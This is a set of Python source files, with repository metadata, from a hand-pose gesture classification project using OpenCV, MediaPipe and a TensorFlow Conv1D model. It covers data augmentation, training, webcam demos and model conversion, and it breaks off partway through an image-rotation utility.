{ "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6320939064025879, "avg_line_length": 35.5, "blob_id": "5526a7d699b863c87493005f624b7fde6b2b6936", "content_id": "d611905c4afd18d8147334069712b17bd4491de4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/utils/get_camera_by_index.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import time\nimport cv2\n\nfor camera_index in range(5, -1, -1):\n camera = cv2.VideoCapture(camera_index)\n print(f\"checking for camera input at index: {camera_index}\")\n test, frame = camera.read()\n if test and frame is not None:\n if camera_index > 1:\n print(f\"external camera found at index: {camera_index}\")\n else:\n print(f\"built-in camera found at index: {camera_index}\")\n print(f\"camera resolution: {frame.shape[0]} {frame.shape[1]}\")\n camera.release()\n" }, { "alpha_fraction": 0.5125786066055298, "alphanum_fraction": 0.5361635088920593, "avg_line_length": 26.65217399597168, "blob_id": "c68d26f716f5e9f633b8e17296d2c4a03c95d821", "content_id": "07fbf94e8f73cbc51176d03a710da7fa0755f12e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 636, "license_type": "no_license", "max_line_length": 86, "num_lines": 23, "path": "/src/checkpoints.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau\n\ndef model_checkpoint(save_path):\n return ModelCheckpoint(save_path,\n monitor='accuracy',\n verbose=1,\n save_best_only=True, \n mode='max')\n\ndef tensorboard():\n return TensorBoard(log_dir='logs')\n\ndef reduce_lr_on_plateau():\n return ReduceLROnPlateau(\n monitor=\"accuracy\",\n factor=0.1,\n patience=3,\n verbose=0,\n mode=\"auto\",\n min_delta=0.01,\n cooldown=0,\n min_lr=0.00001,\n )\n" }, { "alpha_fraction": 0.6652777791023254, "alphanum_fraction": 0.675000011920929, "avg_line_length": 35, "blob_id": "93cfed7eadeb9720005ba879f2d6e0f2b201f62c", "content_id": "a2f931b452e9543fa3c0a25ad1fe6807fceb02ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "no_license", "max_line_length": 105, "num_lines": 20, "path": "/utils/gesture_filter.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np \n\ndef is_valid_ok(mp_hands, hand_landmarks):\n\n index_finger = np.array((float(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].x ),\n float(hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP].y )))\n\n thumb_finger = np.array((float(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].x ),\n float(hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP].y)))\n\n #calculating the distance between index finger tip and thumb finger tip\n distance = np.linalg.norm(index_finger - thumb_finger) * 100\n\n if 0.5 < distance < 3.0:\n return True\n \n return False\n\ndef L_gesture(mp_hands, hand_landmarks):\n pass\n" }, { "alpha_fraction": 0.5077044367790222, "alphanum_fraction": 0.5270643830299377, "avg_line_length": 34.15277862548828, "blob_id": "274b0113fbbb79689233a4df22880da09b654ec3", "content_id": "91e01bdc7901382c1c7faef4a3ad9fc5b8cb9f84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2531, "license_type": "no_license", "max_line_length": 122, "num_lines": 72, "path": "/utils/augment.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "\"\"\"\nThis code is for MultiMoodHandGestRecog dataset\nlink: https://www.gti.ssr.upm.es/images/Data/Downloads/MultiModalHandGestureDataset/MultiModHandGestRecog.rar\n\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport os\nimport glob\nimport tqdm \nfrom argparse import ArgumentParser\nfrom rotate import rotate_image, random_rotation\n\n# \"/media/zeki/Data/Dataset/MultiModHandGestRecog/near-infrared/\"\n\n\ndef img_aug(args):\n src_path = args.image_dir\n ang_1 = -25\n ang_2 = 25\n # user = os.listdir(src_path)\n # for usr in user:\n folder = ['five','four','three','two','C','heavy','hang','L','ok','palm','palm_u']\n for dir in tqdm.tqdm(folder):\n print(f\"Processing: {dir}\")\n imgs = glob.glob(src_path + dir + \"/*.png\") # + usr + \"/train_pose/\"\n dest = \"/aug-\" + dir + \"/\" \n if not os.path.exists(src_path + dir + dest):\n os.mkdir(src_path + dir + dest) # usr + \"/train_pose/\" \n for img in imgs:\n print(f\"Processing image: {img}\")\n\n image = cv2.imread(img)\n image = cv2.resize(image, (640,480))\n \n #flipping\n \"\"\"\n save image in same folder as F_image_name\n \"\"\"\n \n f_img = image.copy()\n f_img = cv2.flip(f_img, 1)\n f_img = cv2.resize(f_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_F_%s\"%str(img).split(\"/\")[-1], f_img) #usr + \"/train_pose/\"\n # cv2.imwrite(src_path + dir + img, image) # usr + \"/train_pose/\" +\n #random_rotation\n \"\"\"\n save image in same folder as R_image_name\n \"\"\"\n r_img = image.copy()\n r_img = random_rotation(r_img, ang_1, ang_2)\n r_img = cv2.resize(r_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_R_%s\"%str(img).split(\"/\")[-1], r_img) # usr + \"/train_pose/\" +\n \n #ramdom_rotation_and_flipping\n \"\"\"\n save image in same folder as R_F_image_name\n \"\"\"\n r_f_img = image.copy()\n r_f_img = cv2.flip(r_f_img, 1)\n r_f_img = cv2.resize(r_f_img, (640, 480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_R_F_%s\"%str(img).split(\"/\")[-1], r_f_img) # usr + \"/train_pose/\" +\n\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n print(p.format_usage())\n args = p.parse_args()\n img_aug(args)\n" }, { "alpha_fraction": 0.5175231099128723, "alphanum_fraction": 0.5338636636734009, "avg_line_length": 45.049503326416016, "blob_id": "849c318438cdb83511152575ca51a41343676994", "content_id": "600778287732cf40215ca2d88d8ace02be2423b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4651, "license_type": "no_license", "max_line_length": 119, "num_lines": 101, "path": "/mediapipe_hands_demo_video.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\nvideo_folder = \"Video/\"\ncap = cv2.VideoCapture(2)\n\nfps = cap.get(cv2.CAP_PROP_FPS)\nprint(f\"FPS: {fps}\")\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\nwith mp_hands.Hands(\n min_detection_confidence=0.7,\n min_tracking_confidence=0.7) as hands:\n while cap.isOpened():\n start = time.time()\n success, image = cap.read()\n frame = image.copy()\n\n image_width, image_height, _ = image.shape\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n\n # Flip the image horizontally for a later selfie-view display, and convert\n # the BGR image to RGB.\n\n image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n filler_image = cv2.cvtColor(gray_image, cv2.COLOR_GRAY2BGR)\n\n # To improve performance, optionally mark the image as not writeable to\n # pass by reference.\n image.flags.writeable = False\n results = hands.process(filler_image) # filler_image\n\n # Draw the hand annotations on the image.\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n for point in mp_hands.HandLandmark:\n index_finger_mcp = np.array((int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.INDEX_FINGER_MCP].y * image_width)))\n\n middle_finger_mcp = np.array(\n (int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.MIDDLE_FINGER_MCP].y * image_width)))\n\n ring_finger_mcp = np.array((int(hand_landmarks.landmark[point.RING_FINGER_MCP].x * image_height),\n int(hand_landmarks.landmark[point.RING_FINGER_MCP].y * image_width)))\n\n pinky_finger_mcp = np.array((int(hand_landmarks.landmark[point.PINKY_MCP].x * image_height),\n int(hand_landmarks.landmark[point.PINKY_MCP].y * image_width)))\n\n thumb_cmc = np.array((int(hand_landmarks.landmark[point.THUMB_CMC].x * image_height),\n int(hand_landmarks.landmark[point.THUMB_CMC].y * image_width)))\n\n wrist = np.array((int(hand_landmarks.landmark[point.WRIST].x * image_height),\n int(hand_landmarks.landmark[point.WRIST].y * image_width)))\n\n normalizedLandmark = hand_landmarks.landmark[point]\n pixelCoordinatesLandmark = mp_drawing._normalized_to_pixel_coordinates(normalizedLandmark.x,\n normalizedLandmark.y,\n image_width, image_height)\n\n mp_drawing.draw_landmarks(\n image, hand_landmarks, mp_hands.HAND_CONNECTIONS)\n\n vertices = np.array([[index_finger_mcp[0], index_finger_mcp[1]],\n [middle_finger_mcp[0], middle_finger_mcp[1]],\n [ring_finger_mcp[0], ring_finger_mcp[1]],\n [pinky_finger_mcp[0], pinky_finger_mcp[1]],\n [wrist[0], wrist[1]],\n [thumb_cmc[0], thumb_cmc[1]]], dtype=np.int32)\n\n pts = vertices.reshape((-1, 1, 2))\n cv2.polylines(image, [pts], isClosed=True, color=(0, 255, 255), thickness=1)\n # fill the palm zone.\n cv2.fillPoly(image, [pts], color=(0, 255, 255))\n cv2.line(image, (index_finger_mcp[0], index_finger_mcp[1]),\n (pinky_finger_mcp[0], pinky_finger_mcp[1]), (255, 0, 0), thickness=3)\n\n cv2.imshow('MediaPipe Hands', image)\n cv2.imshow('Original frame', cv2.flip(frame, 1))\n\n if cv2.waitKey(5) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n cap.release()\n\ncap.release()\n" }, { "alpha_fraction": 0.581260621547699, "alphanum_fraction": 0.5860306620597839, "avg_line_length": 32.72988510131836, "blob_id": "170b800794d81103749051bc4347b7dae91cc06c", "content_id": "8c3d72949b4cbc1c899a2e93ff6efd3ce7e99ca4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5870, "license_type": "no_license", "max_line_length": 119, "num_lines": 174, "path": "/src/train.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport datetime\nimport glob\nimport os\nimport tqdm\nfrom argparse import ArgumentParser\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom tensorflow.keras.models import load_model, save_model\n\nimport models\nfrom live_test import WebcamTest\nfrom checkpoints import model_checkpoint, tensorboard, reduce_lr_on_plateau\nfrom data import Dataloader\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\ndef get_pose_labels():\n\n with open('encoded_labels.json', 'r') as f:\n labels = json.load(f, encoding='unicode_escape')\n\n return labels\n\n\ndef genModelPath():\n now = datetime.datetime.now()\n\n if not os.path.exists(os.getcwd() + '/models'):\n os.makedirs(os.getcwd() + '/models')\n else:\n name = 'model_{}-{}-{}:{}'.format(now.day, now.month, now.hour, now.minute)\n if not os.path.exists('models/' + name):\n os.makedirs('models/' + name)\n\n return 'models/' + name + '/trained_model.h5'\n\n\ndef get_latest_model_dir():\n return max(glob.glob(os.path.join('models/', '*/')), key=os.path.getmtime)\n\n\ndef check_gpu_status():\n physical_devices = tf.config.list_physical_devices('GPU')\n\n if physical_devices:\n for device in physical_devices:\n print(f\" GPU is available: {device}\")\n else:\n print(\"GPU not available\")\n\n\ndef train(args):\n check_gpu_status()\n save_path = genModelPath()\n\n data = Dataloader(args)\n train_ds = data.get_train_data()\n test_ds = data.get_test_data()\n number_of_gestures = 10\n\n model = models.conv_model((63, 1), number_of_gestures)\n\n print(model.summary())\n\n history = model.fit(train_ds,\n epochs=args.epochs,\n batch_size=args.batch_size,\n callbacks=[tensorboard(), reduce_lr_on_plateau(), model_checkpoint(save_path)],\n validation_data=test_ds,\n verbose=1\n )\n\n model_dir = 'models/'\n save_model(model, model_dir, overwrite=True, include_optimizer=False)\n os.environ['MODEL_DIR'] = model_dir\n convert_to_tflite(save_path)\n print('-' * 50 + '\\n')\n print(\"\\nModel training has ended\\n\")\n print('-' * 50 + '\\n')\n plot_loss(history)\n\n\ndef plot_loss(history):\n print(\"Plotting graphs\")\n plt.plot(history.history['loss'], color='red')\n plt.plot(history.history['accuracy'])\n plt.xlabel('epoch')\n plt.ylabel('loss and accuracy')\n plt.title('Accuracy vs loss')\n plt.legend(['train', 'valid'], loc='upper right')\n plt.savefig(f'model_diagnostics/model_losses_performance.jpg')\n print(\"done plotting losses at model_diagnostics/model_losses_performance.jpg\")\n\n\ndef get_recent_model():\n print('-' * 50 + '\\n')\n print(f'\\n Fetching the recent model from: {get_latest_model_dir()}')\n model = load_model(os.path.join(get_latest_model_dir(), 'trained_model.h5'))\n return model\n\n\ndef convert_to_tflite(model_dir):\n print('-' * 50 + '\\n')\n converter = tf.lite.TFLiteConverter.from_saved_model(model_dir) \n tflite_model = converter.convert()\n\n with open(model_dir + '/gesture_model.tflite', 'wb') as f:\n f.write(tflite_model)\n\n print(f\"converted to tflite version\")\n\n\ndef test(args):\n\n model = get_recent_model()\n\n if args.test_live == 'True':\n test_on_camera = WebcamTest(model)\n test_on_camera.detectHands()\n elif args.test_csv:\n test_folder(model, args.test_csv)\n\n\ndef test_folder(model, csv):\n \n test_csv = pd.read_csv(csv)\n test_images = test_csv['file_name']\n test_label = list(test_csv['label']) \n predicted_label = []\n labels = get_pose_labels()\n\n for img_file_name in tqdm.tqdm(test_images, desc='Testing on images.'): \n file_path = img_file_name.split(\"../../\")[1]\n img = cv2.imread(file_path)\n\n img = np.expand_dims(img, axis=0)\n prediction = np.argmax(model.predict(img))\n predicted_label.append(labels[prediction])\n\n confusion_mat = confusion_matrix(test_label, predicted_label)\n accuracy = accuracy_score(test_label, predicted_label)\n print(f\"confusion matrix: {confusion_mat} accuracy: {accuracy}\")\n \n\nif __name__ == '__main__':\n\n p = ArgumentParser()\n p.add_argument('--csv', type=str, required=False, default='../data/landmarks.csv', help='Location of the csv file '\n 'containing landmarks '\n 'data')\n p.add_argument('--split_size', type=float, required=False, default=0.05, help='Splitting the data to train and '\n 'test size')\n p.add_argument('--test_csv', required=False, type=str, default='../Test_images/test_data.csv', help='Folder '\n 'containing '\n 'test images')\n p.add_argument('--test_live', required=False, type=str, default='False', help='Testing on live video')\n p.add_argument('--batch_size', required=False, default=64, type=int, help='Batch size for training')\n p.add_argument('--epochs', required=False, type=int, default=10, help='Number of training epochs')\n p.add_argument('--train', required=True, type=str, default='True', help='Train mode')\n p.add_argument('--test', required=True, type=str, default='False', help='Test mode')\n\n print(p.format_usage())\n args = p.parse_args()\n\n if args.train == 'True':\n train(args)\n elif args.test == 'True':\n test(args)\n\n" }, { "alpha_fraction": 0.45075756311416626, "alphanum_fraction": 0.6003788113594055, "avg_line_length": 22, "blob_id": "b56e338450bc28ac9936dc8b5bb440a17f98e968", "content_id": "a8c048422ee120f89ca79c7a8c7677989a61451e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 528, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/misc/line_drawing.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2 \nimport numpy as np \n\nimage = np.zeros((640,480,3))\npoint_1 = np.array((100,100))\npoint_2 = np.array((300,100))\npoint_3 = np.array((400, 400))\n\nline = [point_1, point_2]\n\nv1 = [line[1][0] - line[0][0], line[1][1] - line[0][1]]\nv2 = [line[1][0] - point_3[0], line[1][1] - point_3[1]]\n\nxp = (v1[0] * v2[1]) - (v1[1] * v2[0])\n\nprint(xp)\n\ncv2.line(image, point_1, point_2, (0,255,0), 2)\ncv2.circle(image, point_3, radius=0, color=(0, 0, 255), thickness=5)\ncv2.imshow('test', image)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.4739725887775421, "alphanum_fraction": 0.49771690368652344, "avg_line_length": 27.842105865478516, "blob_id": "43f3092c5bb7bf3f5e6d133db221f7853c79f026", "content_id": "f8f8a8e47ce8ab69d169fd2ad431be4eb1c6f768", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 101, "num_lines": 38, "path": "/misc/hand_bbox.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport mediapipe as mp\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\ncap = cv2.VideoCapture(0)\n\n_, frame = cap.read()\n\nh, w, _ = frame.shape\n\nwhile True:\n _, frame = cap.read()\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w \n y_min = h \n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n cv2.rectangle(frame, (x_min - 30, y_min - 30), (x_max + 30 , y_max + 30), (0, 255, 0), 2)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n cv2.imshow(\"Frame\", frame)\n\n cv2.waitKey(1)" }, { "alpha_fraction": 0.6656171083450317, "alphanum_fraction": 0.7015113234519958, "avg_line_length": 35.906978607177734, "blob_id": "d97481df399e9ba116ecf5fbccdd413f6553d689", "content_id": "3da5239bcceea5e6386f7b58c54c1f89b65ed242", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 91, "num_lines": 43, "path": "/src/models.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.layers import Dense, Conv1D, MaxPooling1D\nfrom tensorflow.keras.layers import Dropout, Input\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.models import Model\nfrom tensorflow.python.keras.layers.core import Flatten\n\n\ndef test_model():\n model = Sequential([\n Dense(64, activation='relu'),\n Dense(32, activation='relu'),\n Dense(16, activation='relu'),\n Dense(10)\n ])\n\n model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n\ndef conv_model(input_size, number_of_gestures):\n\n inputs = Input(input_size)\n conv1d = Conv1D(filters=512, kernel_size=3, activation='linear')(inputs)\n conv2d = Conv1D(filters=256, kernel_size=3, activation='elu')(conv1d)\n conv3d = Conv1D(filters=128, kernel_size=3, activation='relu')(conv2d)\n conv4d = Conv1D(filters=64, kernel_size=2, activation='elu')(conv3d)\n drop1 = Dropout(0.2)(conv4d)\n max_pool = MaxPooling1D(pool_size=2)(drop1) \n flatten = Flatten()(max_pool)\n dense1 = Dense(256, activation='relu')(flatten)\n dense2 = Dense(128, activation='elu')(dense1)\n dense3 = Dense(32, activation='relu')(dense2)\n outputs = Dense(number_of_gestures, activation='softmax')(dense3)\n\n model = Model(inputs=inputs, outputs=outputs)\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n plot_model(model, to_file='model_diagnostics/model_architecture.jpg', show_shapes=True)\n\n return model\n\n" }, { "alpha_fraction": 0.5353233814239502, "alphanum_fraction": 0.5462686419487, "avg_line_length": 28.58823585510254, "blob_id": "bab0a1214b05081bfe850df0de9ab2e135e6616d", "content_id": "e06209ed47a467da1f126407cbfac0dc4f6a2468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 97, "num_lines": 34, "path": "/utils/test_resize.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport os\nimport glob\nimport tqdm \nfrom argparse import ArgumentParser\n\ndef img_aug(args):\n \n src_path = args.image_dir\n folder = os.listdir(src_path)\n \n for dir in tqdm.tqdm(folder):\n print(f\"Processing: {dir}\")\n imgs = glob.glob(src_path + dir + \"/*.png\") # + usr + \"/train_pose/\"\n dest = \"/resize-\" + dir + \"/\" \n \n if not os.path.exists(src_path + dir + dest):\n os.mkdir(src_path + dir + dest) # usr + \"/train_pose/\" \n \n for img in imgs:\n print(f\"Processing image: {img}\")\n\n image = cv2.imread(img)\n image = cv2.resize(image, (640,480))\n cv2.imwrite(src_path + dir + dest + f\"{dir}_%s\"%str(img).split(\"/\")[-1], image)\n \n\nif __name__ == \"__main__\":\n p = ArgumentParser()\n p.add_argument('--image_dir', type=str, default='./', help='Directory containing the images')\n print(p.format_usage())\n args = p.parse_args()\n img_aug(args)" }, { "alpha_fraction": 0.6900269389152527, "alphanum_fraction": 0.7035040259361267, "avg_line_length": 38.05263137817383, "blob_id": "1ea2ab61b9befc1d397928ea197aeaba0a0869ac", "content_id": "4e4a4076620f8daad5d1cade54e1bd65eb5f9f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 94, "num_lines": 38, "path": "/misc/getpbtxt.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport os \nfrom tensorflow import keras\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.python.framework.convert_to_constants import convert_variables_to_constants_v2\nimport numpy as np\n#path of the directory where you want to save your model\nfrozen_out_path = os.getcwd() #\"../cloud_models/model_24-6-3:48/\"\n# name of the .pb file\nfrozen_graph_filename = \"../cloud_models/model_24-6-3:48/\"\nmodel = load_model(frozen_graph_filename)\n# Convert Keras model to ConcreteFunction\nfull_model = tf.function(lambda x: model(x))\nfull_model = full_model.get_concrete_function(\n tf.TensorSpec(model.inputs[0].shape, model.inputs[0].dtype))\n# Get frozen ConcreteFunction\nfrozen_func = convert_variables_to_constants_v2(full_model)\nfrozen_func.graph.as_graph_def()\nlayers = [op.name for op in frozen_func.graph.get_operations()]\nprint(\"-\" * 60)\nprint(\"Frozen model layers: \")\nfor layer in layers:\n print(layer)\nprint(\"-\" * 60)\nprint(\"Frozen model inputs: \")\nprint(frozen_func.inputs)\nprint(\"Frozen model outputs: \")\nprint(frozen_func.outputs)\n# Save frozen graph to disk\ntf.io.write_graph(graph_or_graph_def=frozen_func.graph,\n logdir=frozen_out_path,\n name=f\"frozen_model.pb\",\n as_text=False)\n# Save its text representation\ntf.io.write_graph(graph_or_graph_def=frozen_func.graph,\n logdir=frozen_out_path,\n name=f\"frozen_graph.pbtxt\",\n as_text=True)\n" }, { "alpha_fraction": 0.6697154641151428, "alphanum_fraction": 0.6961382031440735, "avg_line_length": 27.941177368164062, "blob_id": "c65f39144858a16ca5df2215aac6aab2cf213e1c", "content_id": "ac195db4cd9ecee921ff58061c433ae2e0f5b94a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 984, "license_type": "no_license", "max_line_length": 107, "num_lines": 34, "path": "/misc/convert_keras_to_onnx.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import tensorflow as tf \nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.models import load_model\nimport onnx\nimport keras2onnx, os\nfrom argparse import ArgumentParser\nfrom datetime import datetime\nimport tf2onnx\nimport onnxruntime as rt\n\n\ndef convert_from_keras_to_onnx():\n\n model = load_model('cloud_models/model_24-6-3:48/') #os.path.join(args.keras_model, 'trained_model.h5'\n print(model.summary())\n\n onnx_model = keras2onnx.convert_keras(model, name=\"example\", target_opset=9, channel_first_inputs=None)\n onnx.save_model(onnx_model, 'cloud_converted_model.onnx')\n\ndef convert_from_tf_to_onxx():\n \n spec = (tf.TensorSpec((None, 224, 224, 3), tf.float32, name=\"input\"),)\n output_path = model.name + \".onnx\"\n\n\n\nif __name__ == '__main__':\n\n # p = ArgumentParser()\n # p.add_argument('--keras_model', type=str, required=True, default='models/model_24-6-3:48/')\n\n # args = p.parse_args()\n \n convert_from_keras_to_onnx()\n" }, { "alpha_fraction": 0.6177992224693298, "alphanum_fraction": 0.6222835183143616, "avg_line_length": 37.6533317565918, "blob_id": "896d32b2644bee6f1cb666b024d457e08af0e6b4", "content_id": "bd1b9efa483407dded46c9a6de2e981b5ea8d378", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "no_license", "max_line_length": 110, "num_lines": 75, "path": "/src/data.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "# from re import S\nimport numpy as np\nfrom numpy import array\nimport pandas as pd\nimport os, pickle\nimport tensorflow as tf\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass Dataloader:\n\n def __init__(self, args):\n self.csv_data = pd.read_csv(args.csv)\n self.csv_label = self.csv_data.pop('label')\n self.clean_csv()\n\n self.split_size = args.split_size\n self.batch_size = args.batch_size\n self.train_x = self.test_x = self.train_y = self.test_y = None\n self.encode_labels()\n self.split_data_to_train_test()\n\n def clean_csv(self):\n self.csv_data = self.csv_data.drop('file_name', axis=1)\n self.csv_data = self.csv_data.drop('hand', axis=1)\n self.csv_data = shuffle(self.csv_data)\n\n self.csv_data = np.array(self.csv_data)\n self.csv_label = array(self.csv_label)\n print(f\"csv_data shape: {self.csv_data.shape}\")\n\n def encode_labels(self):\n label_mappings = {}\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(self.csv_label)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n self.csv_label = onehot_encoder.fit_transform(integer_encoded)\n\n for i in range(0, self.csv_label.shape[1]):\n inverted = label_encoder.inverse_transform([i])\n label_mappings[str(i)] = inverted[0]\n print(f\"{i} --> {inverted}\")\n\n with open('encoded_labels.json', 'wb') as fp:\n pickle.dump(label_mappings, fp)\n\n def split_data_to_train_test(self):\n self.train_x, self.test_x, self.train_y, self.test_y = train_test_split(self.csv_data, self.csv_label,\n test_size=self.split_size)\n print(f\"train_x shape: {self.train_x.shape}\")\n print(f\"train_y shape: {self.train_y.shape}\")\n print(f\"test_x shape: {self.test_x.shape}\")\n print(f\"test_y shape: {self.test_y.shape}\")\n\n def get_train_data(self):\n self.train_x = self.train_x.reshape(self.train_x.shape[0], self.train_x.shape[1], 1)\n train_ds = tf.data.Dataset.from_tensor_slices((self.train_x, self.train_y))\n train_ds = train_ds.batch(self.batch_size)\n train_ds = train_ds.prefetch(tf.data.AUTOTUNE)\n\n return train_ds\n\n def get_test_data(self):\n self.test_x = self.test_x.reshape(self.test_x.shape[0], self.test_x.shape[1], 1)\n test_ds = tf.data.Dataset.from_tensor_slices((self.test_x, self.test_y))\n test_ds = test_ds.batch(self.batch_size)\n test_ds = test_ds.prefetch(tf.data.AUTOTUNE)\n\n return test_ds\n" }, { "alpha_fraction": 0.5371127724647522, "alphanum_fraction": 0.5710111260414124, "avg_line_length": 28, "blob_id": "5ce5c0553faaa13f8f44d7c7930c40314f2a5d1f", "content_id": "83e0343e14751f99ba8317ac9d51e876a252cf31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "no_license", "max_line_length": 71, "num_lines": 59, "path": "/utils/rotate.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport random\n\ndef rotate_image(image, angle):\n\n image_size = (image.shape[1], image.shape[0])\n image_center = tuple(np.array(image_size) / 2)\n\n rot_mat = np.vstack(\n [cv2.getRotationMatrix2D(image_center, angle, 1.0), [0, 0, 1]])\n\n rot_mat_notranslate = np.matrix(rot_mat[0:2, 0:2])\n\n image_w2 = image_size[0] * 0.5\n image_h2 = image_size[1] * 0.5\n\n rotated_coords = [\n (np.array([-image_w2, image_h2]) * rot_mat_notranslate).A[0],\n (np.array([ image_w2, image_h2]) * rot_mat_notranslate).A[0],\n (np.array([-image_w2, -image_h2]) * rot_mat_notranslate).A[0],\n (np.array([ image_w2, -image_h2]) * rot_mat_notranslate).A[0]\n ]\n\n x_coords = [pt[0] for pt in rotated_coords]\n x_pos = [x for x in x_coords if x > 0]\n x_neg = [x for x in x_coords if x < 0]\n\n y_coords = [pt[1] for pt in rotated_coords]\n y_pos = [y for y in y_coords if y > 0]\n y_neg = [y for y in y_coords if y < 0]\n\n right_bound = max(x_pos)\n left_bound = min(x_neg)\n top_bound = max(y_pos)\n bot_bound = min(y_neg)\n\n new_w = int(abs(right_bound - left_bound))\n new_h = int(abs(top_bound - bot_bound))\n\n trans_mat = np.matrix([\n [1, 0, int(new_w * 0.5 - image_w2)],\n [0, 1, int(new_h * 0.5 - image_h2)],\n [0, 0, 1]])\n\n affine_mat = (np.matrix(trans_mat) * np.matrix(rot_mat))[0:2, :]\n\n result = cv2.warpAffine(\n image,\n affine_mat,\n (new_w, new_h),\n 